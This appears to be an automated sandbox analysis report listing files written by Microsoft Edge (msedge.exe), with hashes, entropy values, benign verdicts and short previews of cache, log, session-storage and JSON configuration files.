                                                                                                                                                                                                                                                      SHA-256:729DBAC5DDAAEE3124FDDA36225420D6581E01A76B605D635C5384875CA7146A
                                                                                                                                                                                                                                                      SHA-512:56733285A5E514088706E144113560026BC0A456A22BAA38040A3478751B829EA3581D6A6188B07DFC13CC371DA8C00495EEE1017606851178D5C668A0065ECA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):188889
                                                                                                                                                                                                                                                      Entropy (8bit):6.385950147661342
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:k7UCI282Cm3gsRw/7X0owL/0mqMa90c71Ol0lM3zm:a5RwT0TL/05p78mki
                                                                                                                                                                                                                                                      MD5:DB7257870B6EF10B9A72EFCCFFE45B5A
                                                                                                                                                                                                                                                      SHA1:DBBC78BCE78D75D7F46A9AAA9B8CFB852AE828C7
                                                                                                                                                                                                                                                      SHA-256:64B319E5A001564D9584D1253CE28999FAA94FD10756181352EF76027E115760
                                                                                                                                                                                                                                                      SHA-512:60701E462809D8FB7A09BE00B1AAB96BDDE31EF6A7B870FD0F65C1ABF18C3CF9834C986F2A3391DB82388254BD6012D165A7D6F640CE8D12C4CC17873BCDA0FE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0....z3.................;....x..........,T.8..`,.....L`.....,T...`......L`......Rc..F.....exports...Rc&.......module....Rc^.......define....Rb.k.W....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.j..b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0\r..m..................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                      Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:kPUFXTXl/ly/l9/lxE0tlla/loGZEln:kkzmO0goOMn
                                                                                                                                                                                                                                                      MD5:D7A298DE8C5830C6E568337FFDCFBEFE
                                                                                                                                                                                                                                                      SHA1:0A8CBD2BA8B80FFC619868C3EA06649DE0C34069
                                                                                                                                                                                                                                                      SHA-256:6AFD31105A44CD283B1296CB9C231961B7DF6182593BF11F3E26B10A94F9FF46
                                                                                                                                                                                                                                                      SHA-512:26511867A8810A65952FCB397B533E52CDB738C0B726F44BE210752D21C187112E545E812B044B9365113812B1859FCE294C2A35B8FCDDE78C304E5BB68FE295
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@.....[.oy retne.........................X....,..................l../.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                      Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:kPUFXTXl/ly/l9/lxE0tlla/loGZEln:kkzmO0goOMn
                                                                                                                                                                                                                                                      MD5:D7A298DE8C5830C6E568337FFDCFBEFE
                                                                                                                                                                                                                                                      SHA1:0A8CBD2BA8B80FFC619868C3EA06649DE0C34069
                                                                                                                                                                                                                                                      SHA-256:6AFD31105A44CD283B1296CB9C231961B7DF6182593BF11F3E26B10A94F9FF46
                                                                                                                                                                                                                                                      SHA-512:26511867A8810A65952FCB397B533E52CDB738C0B726F44BE210752D21C187112E545E812B044B9365113812B1859FCE294C2A35B8FCDDE78C304E5BB68FE295
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@.....[.oy retne.........................X....,..................l../.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                      Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:kPUFXTXl/ly/l9/lxE0tlla/loGZEln:kkzmO0goOMn
                                                                                                                                                                                                                                                      MD5:D7A298DE8C5830C6E568337FFDCFBEFE
                                                                                                                                                                                                                                                      SHA1:0A8CBD2BA8B80FFC619868C3EA06649DE0C34069
                                                                                                                                                                                                                                                      SHA-256:6AFD31105A44CD283B1296CB9C231961B7DF6182593BF11F3E26B10A94F9FF46
                                                                                                                                                                                                                                                      SHA-512:26511867A8810A65952FCB397B533E52CDB738C0B726F44BE210752D21C187112E545E812B044B9365113812B1859FCE294C2A35B8FCDDE78C304E5BB68FE295
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@.....[.oy retne.........................X....,..................l../.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6119
                                                                                                                                                                                                                                                      Entropy (8bit):3.388195519612821
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:nxiw2Cc6OEbzxkbt1UDmWkwA9Xp+Z/v+Vizt5SLl9iSrY1xQCEB6:ADtEHSx1KXU9Xp+ZnKix5SLl9iSrYD7l
                                                                                                                                                                                                                                                      MD5:E942A0D11BCD593AA0E40E6E59BF7AD0
                                                                                                                                                                                                                                                      SHA1:AFCE66AB73133DD92BEAB7E6E235EA3F51B6AF14
                                                                                                                                                                                                                                                      SHA-256:DB2FCDD2F9D9D94E0A24B84107905AE5AD439AD34BEF1E7FDEBC07052482CF84
                                                                                                                                                                                                                                                      SHA-512:FA4A03C6522953536C65E57096CF2C522A56EF26AE310A0B7B1ECA18E37860F0A4E88321FEAD3EC46A9244B8B4981D380064B4B823311F700BBD4ECB72CF7CEA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................*.b................next-map-id.1.Cnamespace-96de9d97_57fe_4d0d_9785_fc1df169b792-https://ntp.msn.com/.0/*..................map-0-shd_sweeper.,{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.h.p.-.h.a.s.p.o.l.l.,.p.r.g.-.e.h.p.s.b.h.v.,.a.d.s.-.m.n.-.m.i.g.r.,.x.a.d.s.-.a.d.q.i.s.c.b.m.m.-.t.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.-.e.n.-.n.s.f.r.e.q.-.t.1.,.p.r.g.-.1.s.w.-.s.a.-.m.a.i.p.r.o.f.i.l.e._.c.,.p.r.g.-.1.s.w.-.s.a.-.s.p.4.-.t.4.v.2.,.p.r.g.-.1.s.w.-.s.a.l.3.f.c.t.b.2.,.p.r.g.-.1.s.w.-.n.o.a.b.r.t.-.r.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.1.s.-.w.p.o.-.p.r.1.-.s.d.s.h.p.1.5.,.p.r.g.-.1.s.w.-.d.e.f.e.r.c.o.n.,.p.r.g.-.f.i.n.-.l.2.d.u.e.a.,.2.4.0.9.-.n.e.w.-.b.i.n.g.-.d.e.s.i.g.n.-.c.,.p.r.g.-.a.d.s.p.e.e.k.,.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                                                                                      Entropy (8bit):5.167093457722323
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi13oEl4q2PFi23oH+TcwtrQMxIFUt8YWi13tVNJZmw+YWi13tWDkwOFi23oH+L:2i1YEmvdZYebCFUt87i19h/+7i1q5wZn
                                                                                                                                                                                                                                                      MD5:1024D6F557D64070CECF5C2931B3FF07
                                                                                                                                                                                                                                                      SHA1:E3F028C98798168D6B994C221B743BE934FB2A2D
                                                                                                                                                                                                                                                      SHA-256:8A69A0DA8F0FC6D5693A9B193FEA56F58CC3A5FAA9C05702573C640C594E9AA9
                                                                                                                                                                                                                                                      SHA-512:834FFC1DBDA04124E6BF5069D9815E34D726953158551DADC95FC56797D8D51D2D6033D628E8778BA20444D90D8AC2382E03822CA7864F0CCFD5974A8AC32DC3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.544 1a00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/30-16:38:34.546 1a00 Recovering log #3.2024/11/30-16:38:34.549 1a00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                                                                                      Entropy (8bit):5.167093457722323
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi13oEl4q2PFi23oH+TcwtrQMxIFUt8YWi13tVNJZmw+YWi13tWDkwOFi23oH+L:2i1YEmvdZYebCFUt87i19h/+7i1q5wZn
                                                                                                                                                                                                                                                      MD5:1024D6F557D64070CECF5C2931B3FF07
                                                                                                                                                                                                                                                      SHA1:E3F028C98798168D6B994C221B743BE934FB2A2D
                                                                                                                                                                                                                                                      SHA-256:8A69A0DA8F0FC6D5693A9B193FEA56F58CC3A5FAA9C05702573C640C594E9AA9
                                                                                                                                                                                                                                                      SHA-512:834FFC1DBDA04124E6BF5069D9815E34D726953158551DADC95FC56797D8D51D2D6033D628E8778BA20444D90D8AC2382E03822CA7864F0CCFD5974A8AC32DC3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.544 1a00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/30-16:38:34.546 1a00 Recovering log #3.2024/11/30-16:38:34.549 1a00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                      Entropy (8bit):3.8555066787627545
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:3G/Sl+BTfpsAF4unxRCftLp3X2amEtG1ChqiB1EQKkOAM4:3oSl+5fzFhMLp2FEkChx1lHOp
                                                                                                                                                                                                                                                      MD5:A46CA8CA88FCD68E56DABBD072611711
                                                                                                                                                                                                                                                      SHA1:C4EE7FBE5BF9EF9B15C4C1EF4DAD50CBCA89884D
                                                                                                                                                                                                                                                      SHA-256:01A818348242F96EBD043952F5963582E9DC2E08318F35864EC8F834F169FBF0
                                                                                                                                                                                                                                                      SHA-512:468C29D595810B63CE2446B36E170EF10B3FCF20C7B8172B5C58885F18AED3F3727A5341180F7A749773F2BF8E09689F2EB08F72DEC32A2F1FCE247F9B2EA421
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SNSS..........y..............y......"...y..............y..........y..........y..........y....!.....y..................................y...y1..,......y$...96de9d97_57fe_4d0d_9785_fc1df169b792......y..........y....9.w...........y......y..........................y....................5..0......y&...{F44A76A6-556E-4DC8-8BF2-CF26F02D08AD}........y.............y..........................y..............y........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......X.a#((..Y.a#((.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):345
                                                                                                                                                                                                                                                      Entropy (8bit):5.17523691395439
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1+r+q2PFi23oH+Tcwt7Uh2ghZIFUt8YWi1YxZZmw+YWi1YxNVkwOFi23oH+T8:2i1+r+vdZYebIhHh2FUt87i1e/+7i1ap
                                                                                                                                                                                                                                                      MD5:17EF79A18BBDFD11FF552D068ADB008B
                                                                                                                                                                                                                                                      SHA1:E8652C34F429651A275274FB2269496A68C9D552
                                                                                                                                                                                                                                                      SHA-256:CCFC054679F419A3E7F7EEAAEED09A1FCA9BA150A341F6F3D75FF44FB50D1FB8
                                                                                                                                                                                                                                                      SHA-512:5AB9E2A253FA753EA93E6046C8DB6E23A35F4454CA55DD1C01CC2A0DDB81DB9A3E5253F58E39EF0C5E991E54D0F7C4984227F3A871F292DBEE7097FB83C50F66
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.791 a4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/30-16:38:33.793 a4c Recovering log #3.2024/11/30-16:38:33.793 a4c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):345
                                                                                                                                                                                                                                                      Entropy (8bit):5.17523691395439
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1+r+q2PFi23oH+Tcwt7Uh2ghZIFUt8YWi1YxZZmw+YWi1YxNVkwOFi23oH+T8:2i1+r+vdZYebIhHh2FUt87i1e/+7i1ap
                                                                                                                                                                                                                                                      MD5:17EF79A18BBDFD11FF552D068ADB008B
                                                                                                                                                                                                                                                      SHA1:E8652C34F429651A275274FB2269496A68C9D552
                                                                                                                                                                                                                                                      SHA-256:CCFC054679F419A3E7F7EEAAEED09A1FCA9BA150A341F6F3D75FF44FB50D1FB8
                                                                                                                                                                                                                                                      SHA-512:5AB9E2A253FA753EA93E6046C8DB6E23A35F4454CA55DD1C01CC2A0DDB81DB9A3E5253F58E39EF0C5E991E54D0F7C4984227F3A871F292DBEE7097FB83C50F66
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.791 a4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/30-16:38:33.793 a4c Recovering log #3.2024/11/30-16:38:33.793 a4c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):430
                                                                                                                                                                                                                                                      Entropy (8bit):5.252942857330184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:2i1rvdZYebvqBQFUt87i1lj/+7i1A5wZYebvqBvJ:bpbYebvZg8ufUgYebvk
                                                                                                                                                                                                                                                      MD5:E1A7011432076F6196416F40AD1027B6
                                                                                                                                                                                                                                                      SHA1:FD6914486E56011B938C23870A1F854003E8BDA1
                                                                                                                                                                                                                                                      SHA-256:3A49CDC3FC272D70FE1D3EDDA4A65F3ACB5FE8D231ACA42757972164E9043E4E
                                                                                                                                                                                                                                                      SHA-512:074D255BA7B1466CACFBA772D2802C18A2766C2A7921ABFC95F440EB3DBE9DC5193C3D7051DFA3DDC35A55987BB137E16821EF4FEC20665F0B54ADC26FEB685D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.578 1a00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/30-16:38:34.579 1a00 Recovering log #3.2024/11/30-16:38:34.590 1a00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):430
                                                                                                                                                                                                                                                      Entropy (8bit):5.252942857330184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:2i1rvdZYebvqBQFUt87i1lj/+7i1A5wZYebvqBvJ:bpbYebvZg8ufUgYebvk
                                                                                                                                                                                                                                                      MD5:E1A7011432076F6196416F40AD1027B6
                                                                                                                                                                                                                                                      SHA1:FD6914486E56011B938C23870A1F854003E8BDA1
                                                                                                                                                                                                                                                      SHA-256:3A49CDC3FC272D70FE1D3EDDA4A65F3ACB5FE8D231ACA42757972164E9043E4E
                                                                                                                                                                                                                                                      SHA-512:074D255BA7B1466CACFBA772D2802C18A2766C2A7921ABFC95F440EB3DBE9DC5193C3D7051DFA3DDC35A55987BB137E16821EF4FEC20665F0B54ADC26FEB685D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:34.578 1a00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/30-16:38:34.579 1a00 Recovering log #3.2024/11/30-16:38:34.590 1a00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
